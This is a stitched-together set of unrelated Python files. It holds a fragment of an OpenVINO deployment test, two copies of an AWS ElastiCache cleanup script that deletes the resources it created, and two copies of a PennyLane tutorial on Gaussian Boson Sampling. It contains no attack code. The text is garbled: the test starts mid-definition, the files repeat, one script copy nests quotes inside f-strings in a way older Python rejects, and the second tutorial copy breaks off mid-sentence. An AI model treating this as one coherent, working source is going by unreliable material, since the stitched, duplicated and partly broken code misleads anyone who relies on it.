test_ote_deploy_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) deployment_dir = f'{template_work_dir}/deployed_{template.model_template_id}' command_line = ['ote', 'deploy', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', f'--save-model-to', deployment_dir] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert run(['unzip', 'openvino.zip'], cwd=deployment_dir).returncode == 0 assert run(['python3', '-m', 'venv', 'venv'], cwd=os.path.join(deployment_dir, 'python')).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'wheel'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'demo_package-0.0-py3-none-any.whl'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 patch_demo_py(os.path.join(deployment_dir, 'python', 'demo.py'), os.path.join(deployment_dir, 'python', 'demo_patched.py')) assert run(['python3', 'demo_patched.py', '-m', '../model/model.xml', '-i', f'{os.path.join(ote_dir, args["--test-data-roots"])}'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may # not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """Cleans up the resources created by the Elasticache bootstrapping process. """ import boto3 import logging from elasticache.service_bootstrap import BootstrapResources def delete_sns_topic(topic_ARN: str): sns = boto3.client("sns") sns.delete_topic(TopicArn=topic_ARN) logging.info(f"Deleted SNS topic {topic_ARN}") def delete_security_group(sg_id: str): ec2 = boto3.client("ec2") ec2.delete_security_group(GroupId=sg_id) logging.info(f"Deleted VPC Security Group {sg_id}") def delete_user_group(usergroup_id: str): ec = boto3.client("elasticache") ec.delete_user_group(UserGroupId=usergroup_id) logging.info(f"Deleted ElastiCache User Group {usergroup_id}") # KMS does not allow immediate key deletion; 7 days is the shortest deletion window def delete_kms_key(key_id: str): kms = boto3.client("kms") kms.schedule_key_deletion(KeyId=key_id, PendingWindowInDays=7) logging.info(f"Deletion scheduled for KMS key {key_id}") # delete snapshot and also associated cluster/RG def delete_snapshot(snapshot_name: str): ec = boto3.client("elasticache") # delete actual snapshot response = ec.describe_snapshots(SnapshotName=snapshot_name) snapshot = response['Snapshots'][0] ec.delete_snapshot(SnapshotName=snapshot_name) logging.info(f"Deleted snapshot {snapshot_name}") # delete resource that was used to create snapshot if snapshot['CacheClusterId']: ec.delete_cache_cluster(CacheClusterId=snapshot['CacheClusterId']) logging.info(f"Deleted cache cluster {snapshot["CacheClusterId"]}") elif snapshot['ReplicationGroupId']: # should not happen ec.delete_replication_group(ReplicationGroupId=snapshot['ReplicationGroupId']) logging.info(f"Deleted replication group {snapshot["ReplicationGroupId"]}") def service_cleanup(config: dict): logging.getLogger().setLevel(logging.INFO) resources = BootstrapResources( **config ) try: delete_sns_topic(resources.SnsTopicARN) except: logging.exception(f"Unable to delete SNS topic {resources.SnsTopicARN}") try: delete_security_group(resources.SecurityGroupID) except: logging.exception(f"Unable to delete VPC Security Group {resources.SecurityGroupID}") try: delete_user_group(resources.UserGroupID) except: logging.exception(f"Unable to delete ElastiCache User Group {resources.UserGroupID}") try: delete_kms_key(resources.KmsKeyID) except: logging.exception(f"Unable to schedule deletion for KMS key {resources.KmsKeyID}") try: delete_snapshot(resources.SnapshotName) except: logging.exception(f"Unable to delete snapshot {resources.SnapshotName}")
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may # not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """Cleans up the resources created by the Elasticache bootstrapping process. """ import boto3 import logging from elasticache.service_bootstrap import BootstrapResources def delete_sns_topic(topic_ARN: str): sns = boto3.client("sns") sns.delete_topic(TopicArn=topic_ARN) logging.info(f"Deleted SNS topic {topic_ARN}") def delete_security_group(sg_id: str): ec2 = boto3.client("ec2") ec2.delete_security_group(GroupId=sg_id) logging.info(f"Deleted VPC Security Group {sg_id}") def delete_user_group(usergroup_id: str): ec = boto3.client("elasticache") ec.delete_user_group(UserGroupId=usergroup_id) logging.info(f"Deleted ElastiCache User Group {usergroup_id}") # KMS does not allow immediate key deletion; 7 days is the shortest deletion window def delete_kms_key(key_id: str): kms = boto3.client("kms") kms.schedule_key_deletion(KeyId=key_id, PendingWindowInDays=7) logging.info(f"Deletion scheduled for KMS key {key_id}") # delete snapshot and also associated cluster/RG def delete_snapshot(snapshot_name: str): ec = boto3.client("elasticache") # delete actual snapshot response = ec.describe_snapshots(SnapshotName=snapshot_name) snapshot = response['Snapshots'][0] ec.delete_snapshot(SnapshotName=snapshot_name) logging.info(f"Deleted snapshot {snapshot_name}") # delete resource that was used to create snapshot if snapshot['CacheClusterId']: ec.delete_cache_cluster(CacheClusterId=snapshot['CacheClusterId']) logging.info(f"Deleted cache cluster {snapshot['CacheClusterId']}") elif snapshot['ReplicationGroupId']: # should not happen ec.delete_replication_group(ReplicationGroupId=snapshot['ReplicationGroupId']) logging.info(f"Deleted replication group {snapshot['ReplicationGroupId']}") def service_cleanup(config: dict): logging.getLogger().setLevel(logging.INFO) resources = BootstrapResources( **config ) try: delete_sns_topic(resources.SnsTopicARN) except: logging.exception(f"Unable to delete SNS topic {resources.SnsTopicARN}") try: delete_security_group(resources.SecurityGroupID) except: logging.exception(f"Unable to delete VPC Security Group {resources.SecurityGroupID}") try: delete_user_group(resources.UserGroupID) except: logging.exception(f"Unable to delete ElastiCache User Group {resources.UserGroupID}") try: delete_kms_key(resources.KmsKeyID) except: logging.exception(f"Unable to schedule deletion for KMS key {resources.KmsKeyID}") try: delete_snapshot(resources.SnapshotName) except: logging.exception(f"Unable to delete snapshot {resources.SnapshotName}")
r""" .. role:: html(raw) :format: html Quantum advantage with Gaussian Boson Sampling ============================================== .. meta:: :property="og:description": Using light to perform tasks beyond the reach of classical computers. :property="og:image": https://pennylane.ai/qml/_images/tutorial_gbs_expt2.png .. related:: tutorial_gaussian_transformation Gaussian transformation qsim_beyond_classical Beyond classical computing with qsim qonn Optimizing a quantum optical neural network *Author: PennyLane dev team. Posted: 4 Dec 2020. Last updated: 4 Dec 2020.* On the journey to large-scale fault-tolerant quantum computers, one of the first major milestones is to demonstrate a quantum device carrying out tasks that are beyond the reach of any classical algorithm. The Google Quantum team was the first to claim this achievement, announced in their paper `Quantum supremacy using a programmable superconducting processor <https://www.nature.com/articles/s41586-019-1666-5>`__ [#Arute2019]_. Now a team led by Chao-Yang Lu and Jian-Wei Pan has performed a similar feat using quantum photonics. While Google's experiment performed the task of :doc:`random circuit sampling </demos/qsim_beyond_classical>` using a superconducting processor, the new experiment, published in the paper `Quantum computational advantage using photons <https://science.sciencemag.org/content/early/2020/12/02/science.abe8770?rss=1>`__ [#Zhong2020]_ leverages the quantum properties of light to tackle a task called `Gaussian Boson Sampling <https://strawberryfields.ai/photonics/concepts/gbs.html>`__ (GBS). This tutorial will walk you through the basic elements of GBS, motivate why it is classically challenging, and show you how to explore GBS using PennyLane and the photonic quantum devices accessible via the `PennyLane-Strawberry Fields plugin <https://pennylane-sf.readthedocs.io>`__. If you are interested in possible applications of GBS, or want to access programmable GBS hardware via the cloud, check out the `Strawberry Fields website <https://strawberryfields.ai/>`__ for more details. | .. image:: /demonstrations/tutorial_gbs_expt2.png :align: center :width: 80% :target: javascript:void(0); .. figure:: /demonstrations/tutorial_gbs_expt1.png :align: center :width: 80% :target: javascript:void(0); *Illustration of the experimental setup used by Zhong et al. in Quantum computational advantage using photons* [#Zhong2020]_. The origins of GBS ------------------ Let's first explain the name. `Boson <https://en.wikipedia.org/wiki/Boson>`__ refers to bosonic matter, which, along with fermions, makes up one of the two elementary classes of particles. The most prevalent bosonic system in our everyday lives is light, which is made of particles called photons. Another famous example, though much harder to find, is the Higgs boson. The distinguishing characteristic of bosons is that they follow "Bose-Einstein statistics", which very loosely means that the particles like to bunch together (contrast this to fermionic matter like electrons, which must follow the Pauli Exclusion Principle and keep apart). This property can be observed in simple interference experiments such as the `Hong-Ou Mandel setup <https://en.wikipedia.org/wiki/Hong%E2%80%93Ou%E2%80%93Mandel_effect>`__. If two single photons are interfered on a balanced beamsplitter, they will both emerge at the same output port---there is zero probability that they will emerge at separate outputs. This is a simple but notable quantum property of light; if electrons were brought together in a similar experiement, they would always appear at separate output ports. Gaussian Boson Sampling [#hamilton2017]_ is, in fact, a member of a larger family of "Boson Sampling" algorithms, stemming back to the initial proposal of Aaronson and Arkhipov [#aaronson2013]_ in 2013. Boson Sampling is quantum interferometry writ large. Aaronson and Arkhipov's original proposal was to inject many single photons into distinct input ports of a large interferometer, then measure which output ports they appear at. The natural interference properties of bosons means that photons will appear at the output ports in very unique and specific ways. Boson Sampling was not proposed with any kind of practical real-world use-case in mind. Like the random circuit sampling, it's just a quantum system being its best self. With sufficient size and quality, it is strongly believed to be hard for a classical computer to simulate this efficiently. Finally, the "Gaussian" in GBS refers to the fact that we modify the original Boson Sampling proposal slightly: instead of injecting single photons---which are hard to jointly create in the size and quality needed to demonstrate Boson Sampling conclusively---we instead use states of light that are experimentally less demanding (though still challenging!). These states of light are called Gaussian states, because they bear strong connections to the `Gaussian (or Normal) distribution <https://en.wikipedia.org/wiki/Normal_distribution>`__ from statistics. In practice, we use a particular Gaussian state called a `squeezed state <https://en.wikipedia.org/wiki/Squeezed_states_of_light>`__ for the inputs, since these are arguably the most non-classical of Gaussian states. .. note:: While computationally hard to simulate, Boson Sampling devices, on their own, are not capable of universal quantum computing. However, in combination with other components, GBS is a key building block for a universal device [#Bourassa2020]_. Coding a GBS algorithm ---------------------- The researchers in [#Zhong2020]_ experimentally demonstrate a GBS device by preparing 50 squeezed states and injecting them into a 100-mode interferometer. In this demo, in order to keep things classically simulable, we will stick to a much simpler setting consisting of 4 squeezed states injected into a 4-mode interferometer. At a high level, an interferometer on :math:`N` modes can be represented using an :math:`N\times N` unitary matrix :math:`U`. When decomposed into a quantum optical circuit, the interferometer will be made up of beamsplitters and phase shifters. .. image:: /demonstrations/tutorial_gbs_circuit2.png :align: center :width: 90% :target: javascript:void(0); .. raw:: html <br> Simulating this circuit using PennyLane is easy; we can simply read off the gates from left to right, and convert it into a QNode. """ import numpy as np # set the random seed np.random.seed(42) # import PennyLane import pennylane as qml ###################################################################### # We must define the unitary matrix we would like to embed in the circuit. # We will use SciPy to generate a Haar-random unitary: from scipy.stats import unitary_group # define the linear interferometer U = unitary_group.rvs(4) print(U) ###################################################################### # We can now use this to construct the circuit, choosing a compatible # device. For the simulation, we can use the Strawberry Fields # Gaussian backend. This backend is perfectly suited for simulation of GBS, # as the initial states are Gaussian, and all gates transform Gaussian states to other # Gaussian states. n_wires = 4 cutoff = 10 dev = qml.device("strawberryfields.gaussian", wires=n_wires, cutoff_dim=cutoff) @qml.qnode(dev) def gbs_circuit(): # prepare the input squeezed states for i in range(n_wires): qml.Squeezing(1.0, 0.0, wires=i) # linear interferometer qml.Interferometer(U, wires=range(n_wires)) return qml.probs(wires=range(n_wires)) ###################################################################### # A couple of things to note in this particular example: # # 1. To prepare the input single mode squeezed vacuum state :math:`\ket{re^{i\phi}}`, # where :math:`r = 1` and :math:`\phi=0`, we # apply a squeezing gate (:class:`~pennylane.Squeezing`) to each of the wires (initially in # the vacuum state). # # 2. Next we apply the linear interferometer to all four wires using # :class:`~pennylane.Interferometer` and the unitary matrix ``U``. This operator # decomposes the unitary matrix representing the linear interferometer into single-mode # rotation gates (:class:`~pennylane.PhaseShift`) and two-mode beamsplitters # (:class:`~pennylane.Beamsplitter`). After applying the interferometer, we will denote the # output state by :math:`\ket{\psi'}`. # # 3. GBS takes place physically in an infinite-dimensional Hilbert space, # which is not practical for simulation. We need to set an upper limit on the maximum # number of photons we can detect. This is the # ``cutoff`` value we defined above; we will only be considering detection events # containing 0 to 9 photons per mode. # # We can now execute the QNode, and extract the resulting probability distribution: probs = gbs_circuit().reshape([cutoff] * n_wires) print(probs.shape) ###################################################################### # For example, element ``[1,2,0,1]`` represents the probability of # detecting 1 photon on wire # ``0`` and wire ``3``, and 2 photons at wire ``1``, i.e., the value # # .. math:: \text{prob}(1,2,0,1) = \left|\braketD{1,2,0,1}{\psi'}\right|^2. # # Let's extract and view the probabilities of measuring various Fock states. # Fock states to measure at output measure_states = [(0,0,0,0), (1,1,0,0), (0,1,0,1), (1,1,1,1), (2,0,0,0)] # extract the probabilities of calculating several # different Fock states at the output, and print them out for i in measure_states: print(f"|{"".join(str(j) for j in i)}>: {probs[i]}") ###################################################################### # The GBS Distribution # -------------------- # # Hamilton et al. [#hamilton2017]_ showed that the probability of # measuring a final state containing only 0 or 1 photons per mode is given by # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(U(\bigoplus_i\tanh(r_i))U^T)]_{st}\right|^2}{\prod_{i=1}^N \cosh(r_i)} # # i.e., the sampled single-photon probability distribution is proportional to the **hafnian** of a # submatrix of :math:`U(\bigoplus_i\tanh(r_i))U^T`. # # .. note:: # # The hafnian of a matrix is defined by # # .. math:: \text{Haf}(A) = \sum_{\sigma \in \text{PMP}_{2N}}\prod_{i=1}^N A_{\sigma(2i-1)\sigma(2i)}, # # where :math:`\text{PMP}_{2N}` is the set of all perfect matching permutations of :math:`2N` elements. In graph theory, the # hafnian calculates the number of perfect `matchings # <https://en.wikipedia.org/wiki/Matching_(graph_theory)>`_ in a graph with # adjacency matrix :math:`A`. # # Compare this to the permanent, which calculates the number of perfect matchings on a *bipartite* # graph. Notably, the permanent appears in vanilla Boson Sampling in a similar way # that the hafnian appears in GBS. # The hafnian turns out to be a generalization of the permanent, with the relationship # # .. math:: # # \text{Per(A)} = \text{Haf}\left(\left[\begin{matrix} # 0&A\\ A^T&0 # \end{matrix}\right]\right). # # As any algorithm that could calculate (or even approximate) the hafnian could also calculate the # permanent---a `#P-hard problem <https://en.wikipedia.org/wiki/%E2%99%AFP>`__---it follows that # calculating or approximating the hafnian must also be a classically hard problem. This lies behind # the classical hardness of GBS. # # In this demo, we will use the same squeezing parameter, :math:`z=r`, for # all input states; this allows us to simplify this equation. To start with, the hafnian expression # simply becomes :math:`\text{Haf}[(UU^T\tanh(r))]_{st}`, removing the need for the direct sum. # # Thus, we have # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(UU^T\tanh(r))]_{st}\right|^2}{n_1!n_2!\cdots n_N!\cosh^N(r)}. # # Now that we have the theoretical formulas, as well as the probabilities from our simulated GBS # QNode, we can compare the two and see whether they agree. # # In order to calculate the probability of different GBS events classically, we need a # method for calculating the hafnian. # For this, we will use `The Walrus # <https://the-walrus.readthedocs.io>`_ library (which is installed as a dependency of the # PennyLane-SF plugin): from thewalrus import hafnian as haf ###################################################################### # Now, for the right-hand side numerator, we first calculate the submatrix # :math:`A = [(UU^T\tanh(r))]_{st}`: A = (np.dot(U, U.T) * np.tanh(1)) ###################################################################### # In GBS, we determine the submatrix by taking the # rows and columns corresponding to the measured Fock state. For example, to calculate the submatrix # in the case of the output measurement :math:`\left|{1,1,0,0}\right\rangle`, # we have print(A[:, [0, 1]][[0, 1]]) ###################################################################### # i.e., we consider only the rows and columns where a photon was detected, which gives us # the submatrix corresponding to indices :math:`0` and :math:`1`. ###################################################################### # Comparing to simulation # ----------------------- # # Now that we have a method for calculating the hafnian, let's compare the output to that provided by # the PennyLane QNode. # # **Measuring** :math:`\ket{0,0,0,0}` **at the output** # # This corresponds to the hafnian of an *empty* matrix, which is simply 1: print(1 / np.cosh(1) ** 4) print(probs[0, 0, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{1,1,0,0}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 1]][[0, 1]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{0,1,0,1}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [1, 3]][[1, 3]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[0, 1, 0, 1]) ###################################################################### # **Measuring** :math:`\ket{1,1,1,1}` **at the output** # # This corresponds to the hafnian of the full matrix :math:`A=UU^T\tanh(r)`: A = (np.dot(U, U.T) * np.tanh(1)) print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 1, 1]) ###################################################################### # **Measuring** :math:`\ket{2,0,0,0}` **at the output** # # Since we have two photons in mode ``q[0]``, we take two copies of the # first row and first column, making sure to divide by :math:`2!`: A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 0]][[0, 0]] print(np.abs(haf(A)) ** 2 / (2 * np.cosh(1) ** 4)) print(probs[2, 0, 0, 0]) ###################################################################### # The PennyLane simulation results agree (with almost negligible numerical error) to the # expected result from the Gaussian boson sampling equation! # # This demo provides an entry-level walkthrough to the ideas behind GBS, # providing you with the basic code needed for exploring the ideas behind # the photonic quantum advantage paper. Try changing the number of modes, # the number of injected squeezed states, or the cutoff dimension, and # see how each of these affect the classical computation time. If you're # interested in learning more about GBS, or about photonic quantum # computing in general, the # `Strawberry Fields website <https://strawberryfields.ai/>`__ is a great resource. # # References # ---------- # # .. [#Arute2019] # # Arute, F., Arya, K., Babbush, R., et al. "Quantum supremacy using a programmable # superconducting processor" # `Nature 574, 505-510 (2019) <https://doi.org/10.1038/s41586-019-1666-5>`__. # # .. [#Zhong2020] # # Zhong, H.-S., Wang, H., Deng, Y.-H., et al. (2020). Quantum computational advantage using photons. Science, 10.1126/science.abe8770. # # .. [#hamilton2017] # # Craig S. Hamilton, Regina Kruse, Linda Sansoni, Sonja Barkhofen, Christine Silberhorn, # and Igor Jex. Gaussian boson sampling. Physical Review Letters, 119:170501, Oct 2017. # arXiv:1612.01199, doi:10.1103/PhysRevLett.119.170501. # # .. [#aaronson2013] # # Scott Aaronson and Alex Arkhipov. The computational complexity of linear optics. Theory of # Computing, 9(1):143–252, 2013. doi:10.4086/toc.2013.v009a004. # # .. [#Bourassa2020] # # Bourassa, J. E., Alexander, R. N., Vasmer, et al. (2020). Blueprint for a scalable # photonic fault-tolerant quantum computer. arXiv preprint arXiv:2010.02905. #
r""" .. role:: html(raw) :format: html Quantum advantage with Gaussian Boson Sampling ============================================== .. meta:: :property="og:description": Using light to perform tasks beyond the reach of classical computers. :property="og:image": https://pennylane.ai/qml/_images/tutorial_gbs_expt2.png .. related:: tutorial_gaussian_transformation Gaussian transformation qsim_beyond_classical Beyond classical computing with qsim qonn Optimizing a quantum optical neural network *Author: PennyLane dev team. Posted: 4 Dec 2020. Last updated: 4 Dec 2020.* On the journey to large-scale fault-tolerant quantum computers, one of the first major milestones is to demonstrate a quantum device carrying out tasks that are beyond the reach of any classical algorithm. The Google Quantum team was the first to claim this achievement, announced in their paper `Quantum supremacy using a programmable superconducting processor <https://www.nature.com/articles/s41586-019-1666-5>`__ [#Arute2019]_. Now a team led by Chao-Yang Lu and Jian-Wei Pan has performed a similar feat using quantum photonics. While Google's experiment performed the task of :doc:`random circuit sampling </demos/qsim_beyond_classical>` using a superconducting processor, the new experiment, published in the paper `Quantum computational advantage using photons <https://science.sciencemag.org/content/early/2020/12/02/science.abe8770?rss=1>`__ [#Zhong2020]_ leverages the quantum properties of light to tackle a task called `Gaussian Boson Sampling <https://strawberryfields.ai/photonics/concepts/gbs.html>`__ (GBS). This tutorial will walk you through the basic elements of GBS, motivate why it is classically challenging, and show you how to explore GBS using PennyLane and the photonic quantum devices accessible via the `PennyLane-Strawberry Fields plugin <https://pennylane-sf.readthedocs.io>`__. If you are interested in possible applications of GBS, or want to access programmable GBS hardware via the cloud, check out the `Strawberry Fields website <https://strawberryfields.ai/>`__ for more details. | .. image:: /demonstrations/tutorial_gbs_expt2.png :align: center :width: 80% :target: javascript:void(0); .. figure:: /demonstrations/tutorial_gbs_expt1.png :align: center :width: 80% :target: javascript:void(0); *Illustration of the experimental setup used by Zhong et al. in Quantum computational advantage using photons* [#Zhong2020]_. The origins of GBS ------------------ Let's first explain the name. `Boson <https://en.wikipedia.org/wiki/Boson>`__ refers to bosonic matter, which, along with fermions, makes up one of the two elementary classes of particles. The most prevalent bosonic system in our everyday lives is light, which is made of particles called photons. Another famous example, though much harder to find, is the Higgs boson. The distinguishing characteristic of bosons is that they follow "Bose-Einstein statistics", which very loosely means that the particles like to bunch together (contrast this to fermionic matter like electrons, which must follow the Pauli Exclusion Principle and keep apart). This property can be observed in simple interference experiments such as the `Hong-Ou Mandel setup <https://en.wikipedia.org/wiki/Hong%E2%80%93Ou%E2%80%93Mandel_effect>`__. If two single photons are interfered on a balanced beamsplitter, they will both emerge at the same output port---there is zero probability that they will emerge at separate outputs. This is a simple but notable quantum property of light; if electrons were brought together in a similar experiement, they would always appear at separate output ports. Gaussian Boson Sampling [#hamilton2017]_ is, in fact, a member of a larger family of "Boson Sampling" algorithms, stemming back to the initial proposal of Aaronson and Arkhipov [#aaronson2013]_ in 2013. Boson Sampling is quantum interferometry writ large. Aaronson and Arkhipov's original proposal was to inject many single photons into distinct input ports of a large interferometer, then measure which output ports they appear at. The natural interference properties of bosons means that photons will appear at the output ports in very unique and specific ways. Boson Sampling was not proposed with any kind of practical real-world use-case in mind. Like the random circuit sampling, it's just a quantum system being its best self. With sufficient size and quality, it is strongly believed to be hard for a classical computer to simulate this efficiently. Finally, the "Gaussian" in GBS refers to the fact that we modify the original Boson Sampling proposal slightly: instead of injecting single photons---which are hard to jointly create in the size and quality needed to demonstrate Boson Sampling conclusively---we instead use states of light that are experimentally less demanding (though still challenging!). These states of light are called Gaussian states, because they bear strong connections to the `Gaussian (or Normal) distribution <https://en.wikipedia.org/wiki/Normal_distribution>`__ from statistics. In practice, we use a particular Gaussian state called a `squeezed state <https://en.wikipedia.org/wiki/Squeezed_states_of_light>`__ for the inputs, since these are arguably the most non-classical of Gaussian states. .. note:: While computationally hard to simulate, Boson Sampling devices, on their own, are not capable of universal quantum computing. However, in combination with other components, GBS is a key building block for a universal device [#Bourassa2020]_. Coding a GBS algorithm ---------------------- The researchers in [#Zhong2020]_ experimentally demonstrate a GBS device by preparing 50 squeezed states and injecting them into a 100-mode interferometer. In this demo, in order to keep things classically simulable, we will stick to a much simpler setting consisting of 4 squeezed states injected into a 4-mode interferometer. At a high level, an interferometer on :math:`N` modes can be represented using an :math:`N\times N` unitary matrix :math:`U`. When decomposed into a quantum optical circuit, the interferometer will be made up of beamsplitters and phase shifters. .. image:: /demonstrations/tutorial_gbs_circuit2.png :align: center :width: 90% :target: javascript:void(0); .. raw:: html <br> Simulating this circuit using PennyLane is easy; we can simply read off the gates from left to right, and convert it into a QNode. """ import numpy as np # set the random seed np.random.seed(42) # import PennyLane import pennylane as qml ###################################################################### # We must define the unitary matrix we would like to embed in the circuit. # We will use SciPy to generate a Haar-random unitary: from scipy.stats import unitary_group # define the linear interferometer U = unitary_group.rvs(4) print(U) ###################################################################### # We can now use this to construct the circuit, choosing a compatible # device. For the simulation, we can use the Strawberry Fields # Gaussian backend. This backend is perfectly suited for simulation of GBS, # as the initial states are Gaussian, and all gates transform Gaussian states to other # Gaussian states. n_wires = 4 cutoff = 10 dev = qml.device("strawberryfields.gaussian", wires=n_wires, cutoff_dim=cutoff) @qml.qnode(dev) def gbs_circuit(): # prepare the input squeezed states for i in range(n_wires): qml.Squeezing(1.0, 0.0, wires=i) # linear interferometer qml.Interferometer(U, wires=range(n_wires)) return qml.probs(wires=range(n_wires)) ###################################################################### # A couple of things to note in this particular example: # # 1. To prepare the input single mode squeezed vacuum state :math:`\ket{re^{i\phi}}`, # where :math:`r = 1` and :math:`\phi=0`, we # apply a squeezing gate (:class:`~pennylane.Squeezing`) to each of the wires (initially in # the vacuum state). # # 2. Next we apply the linear interferometer to all four wires using # :class:`~pennylane.Interferometer` and the unitary matrix ``U``. This operator # decomposes the unitary matrix representing the linear interferometer into single-mode # rotation gates (:class:`~pennylane.PhaseShift`) and two-mode beamsplitters # (:class:`~pennylane.Beamsplitter`). After applying the interferometer, we will denote the # output state by :math:`\ket{\psi'}`. # # 3. GBS takes place physically in an infinite-dimensional Hilbert space, # which is not practical for simulation. We need to set an upper limit on the maximum # number of photons we can detect. This is the # ``cutoff`` value we defined above; we will only be considering detection events # containing 0 to 9 photons per mode. # # We can now execute the QNode, and extract the resulting probability distribution: probs = gbs_circuit().reshape([cutoff] * n_wires) print(probs.shape) ###################################################################### # For example, element ``[1,2,0,1]`` represents the probability of # detecting 1 photon on wire # ``0`` and wire ``3``, and 2 photons at wire ``1``, i.e., the value # # .. math:: \text{prob}(1,2,0,1) = \left|\braketD{1,2,0,1}{\psi'}\right|^2. # # Let's extract and view the probabilities of measuring various Fock states. # Fock states to measure at output measure_states = [(0,0,0,0), (1,1,0,0), (0,1,0,1), (1,1,1,1), (2,0,0,0)] # extract the probabilities of calculating several # different Fock states at the output, and print them out for i in measure_states: print(f"|{''.join(str(j) for j in i)}>: {probs[i]}") ###################################################################### # The GBS Distribution # -------------------- # # Hamilton et al. [#hamilton2017]_ showed that the probability of # measuring a final state containing only 0 or 1 photons per mode is given by # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(U(\bigoplus_i\tanh(r_i))U^T)]_{st}\right|^2}{\prod_{i=1}^N \cosh(r_i)} # # i.e., the sampled single-photon probability distribution is proportional to the **hafnian** of a # submatrix of :math:`U(\bigoplus_i\tanh(r_i))U^T`. # # .. note:: # # The hafnian of a matrix is defined by # # .. math:: \text{Haf}(A) = \sum_{\sigma \in \text{PMP}_{2N}}\prod_{i=1}^N A_{\sigma(2i-1)\sigma(2i)}, # # where :math:`\text{PMP}_{2N}` is the set of all perfect matching permutations of :math:`2N` elements. In graph theory, the # hafnian calculates the number of perfect `matchings # <https://en.wikipedia.org/wiki/Matching_(graph_theory)>`_ in a graph with # adjacency matrix :math:`A`. # # Compare this to the permanent, which calculates the number of perfect matchings on a *bipartite* # graph. Notably, the permanent appears in vanilla Boson Sampling in a similar way # that the hafnian appears in GBS. # The hafnian turns out to be a generalization of the permanent, with the relationship # # .. math:: # # \text{Per(A)} = \text{Haf}\left(\left[\begin{matrix} # 0&A\\ A^T&0 # \end{matrix}\right]\right). # # As any algorithm that could calculate (or even approximate) the hafnian could also calculate the # permanent---a `#P-hard problem <https://en.wikipedia.org/wiki/%E2%99%AFP>`__---it follows that # calculating or approximating the hafnian must also be a classically hard problem. This lies behind # the classical hardness of GBS. # # In this demo, we will use the same squeezing parameter, :math:`z=r`, for # all input states; this allows us to simplify this equation. To start with, the hafnian expression # simply becomes :math:`\text{Haf}[(UU^T\tanh(r))]_{st}`, removing the need for the direct sum. # # Thus, we have # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(UU^T\tanh(r))]_{st}\right|^2}{n_1!n_2!\cdots n_N!\cosh^N(r)}. # # Now that we have the theoretical formulas, as well as the probabilities from our simulated GBS # QNode, we can compare the two and see whether they agree. # # In order to calculate the probability of different GBS events classically, we need a # method for calculating the hafnian. # For this, we will use `The Walrus # <https://the-walrus.readthedocs.io>`_ library (which is installed as a dependency of the # PennyLane-SF plugin): from thewalrus import hafnian as haf ###################################################################### # Now, for the right-hand side numerator, we first calculate the submatrix # :math:`A = [(UU^T\tanh(r))]_{st}`: A = (np.dot(U, U.T) * np.tanh(1)) ###################################################################### # In GBS, we determine the submatrix by taking the # rows and columns corresponding to the measured Fock state. For example, to calculate the submatrix # in the case of the output measurement :math:`\left|{1,1,0,0}\right\rangle`, # we have print(A[:, [0, 1]][[0, 1]]) ###################################################################### # i.e., we consider only the rows and columns where a photon was detected, which gives us # the submatrix corresponding to indices :math:`0` and :math:`1`. ###################################################################### # Comparing to simulation # ----------------------- # # Now that we have a method for calculating the hafnian, let's compare the output to that provided by # the PennyLane QNode. # # **Measuring** :math:`\ket{0,0,0,0}` **at the output** # # This corresponds to the hafnian of an *empty* matrix, which is simply 1: print(1 / np.cosh(1) ** 4) print(probs[0, 0, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{1,1,0,0}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 1]][[0, 1]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{0,1,0,1}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [1, 3]][[1, 3]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[0, 1, 0, 1]) ###################################################################### # **Measuring** :math:`\ket{1,1,1,1}` **at the output** # # This corresponds to the hafnian of the full matrix :math:`A=UU^T\tanh(r)`: A = (np.dot(U, U.T) * np.tanh(1)) print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 1, 1]) ###################################################################### # **Measuring** :math:`\ket{2,0,0,0}` **at the output** # # Since we have two photons in mode ``q[0]``, we take 